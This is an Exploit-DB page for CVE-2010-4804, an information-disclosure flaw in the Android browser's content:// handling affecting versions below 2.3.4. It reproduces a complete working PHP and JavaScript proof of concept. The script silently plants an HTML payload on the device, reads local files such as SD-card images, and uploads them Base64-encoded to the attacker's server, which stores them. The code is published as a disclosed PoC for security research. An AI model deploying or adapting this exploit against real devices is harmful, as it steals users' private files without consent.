Google Android - 'content://' URI Multiple Information Disclosure Vulnerabilities

EDB-ID:

18164

CVE:

2010-4804

EDB Verified:

Author:

Thomas Cannon

Type:

webapps

Exploit:   /  

Platform:

Android

Date:

2011-11-28

Vulnerable App: 
<?php 
/* 
* Description:  Android 'content://' URI Multiple Information Disclosure Vulnerabilities
* Bugtraq ID:   48256
* CVE:          CVE-2010-4804
* Affected:     Android < 2.3.4
* Author:       Thomas Cannon
* Discovered:   18-Nov-2010
* Advisory:     http://thomascannon.net/blog/2010/11/android-data-stealing-vulnerability/
*
* Filename:     poc.php
* Instructions: Specify files you want to upload in filenames array. Host this php file
*               on a server and visit it using the Android Browser. Some builds of Android
*               may require adjustments to the script, for example when a German build was
*               tested it downloaded the payload as .htm instead of .html, even though .html
*               was specified. 
*
* Tested on:    HTC Desire (UK Version) with Android 2.2
*/

//  List of the files on the device that we want to upload to our server
$filenames = array("/proc/version","/sdcard/img.jpg");

//  Determine the full URL of this script
$protocol = $_SERVER["HTTPS"] == "on" ? "https" : "http";
$scripturl = $protocol."://".$_SERVER["HTTP_HOST"].$_SERVER["SCRIPT_NAME"];

//  Stage 0:  Display introduction text and a link to start the PoC.
function stage0($scripturl) {
  echo "<b>Android < 2.3.4</b><br>Data Stealing Web Page<br><br>Click: <a href=\"$scripturl?stage=1\">Malicious Link</a>";
}

//  Stage 1:  Redirect to Stage 2 which will force a download of the HTML/JS payload, then a few seconds later redirect 
//            to the payload. We load the payload using a Content Provider so that the JavaScript is executed in the
//            context of the local device - this is the vulnerability.
function stage1($scripturl) {
  echo "<body onload=\"setTimeout('window.location=\'$scripturl?stage=2\'',1000);setTimeout('window.location=\'content://com.android.htmlfileprovider/sdcard/download/poc.html\'',5000);\">";
}

//  Stage 2:  Download of payload, the Android browser doesn't prompt for the download which is another vulnerability.
//            The payload uses AJAX calls to read file contents and encodes as Base64, then uploads to server (Stage 3).
function stage2($scripturl,$filenames) {
  header("Cache-Control: public");
  header("Content-Description: File Transfer");
  header("Content-Disposition: attachment; filename=poc.html");
  header("Content-Type: text/html");
  header("Content-Transfer-Encoding: binary");
?>
<html>
  <body>
    <script language='javascript'>
      var filenames = Array('<?php echo implode("','",$filenames); ?>');
      var filecontents = new Array();
      function processBinary(xmlhttp) {
        data = xmlhttp.responseText;    r = '';   size = data.length;
        for(var i = 0; i < size; i++)   r += String.fromCharCode(data.charCodeAt(i) & 0xff);
        return r;
      }
      function getFiles(filenames) {
        for (var filename in filenames) {
          filename = filenames[filename];
          xhr = new XMLHttpRequest();
          xhr.open('GET', filename, false);
          xhr.overrideMimeType('text/plain; charset=x-user-defined');
          xhr.onreadystatechange = function() { if (xhr.readyState == 4) { filecontents[filename] = btoa(processBinary(xhr)); } }
          xhr.send();
        }
      }
      function addField(form, name, value) {
        var fe = document.createElement('input');
        fe.setAttribute('type', 'hidden');
        fe.setAttribute('name', name);
        fe.setAttribute('value', value);
        form.appendChild(fe);
      }
      function uploadFiles(filecontents) {
        var form = document.createElement('form');
        form.setAttribute('method', 'POST');
        form.setAttribute('enctype', 'multipart/form-data');
        form.setAttribute('action', '<?=$scripturl?>?stage=3');
        var i = 0;
        for (var filename in filecontents) {
          addField(form, 'filename'+i, btoa(filename));
          addField(form, 'data'+i, filecontents[filename]);
          i += 1;
        }
        document.body.appendChild(form);
        form.submit();
      }
      getFiles(filenames);
      uploadFiles(filecontents);
    </script>
  </body>
</html>
<?php
}

//  Stage 3:  Read the file names and contents sent by the payload and write to a file on the server.
function stage3() {
  $fp = fopen("files.txt", "w") or die("Couldn't open file for writing!");
  fwrite($fp, print_r($_POST, TRUE)) or die("Couldn't write data to file!"); 
  fclose($fp); 
  echo "Data uploaded to <a href=\"files.txt\">files.txt</a>!";
}

//  Select the stage to run depending on the parameter passed in the URL
switch($_GET["stage"]) { 
  case "1": 
    stage1($scripturl); 
    break; 
  case "2": 
    stage2($scripturl,$filenames); 
    break; 
  case "3": 
    stage3(); 
    break;
  default: 
    stage0($scripturl); 
    break; 
} 
?>
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services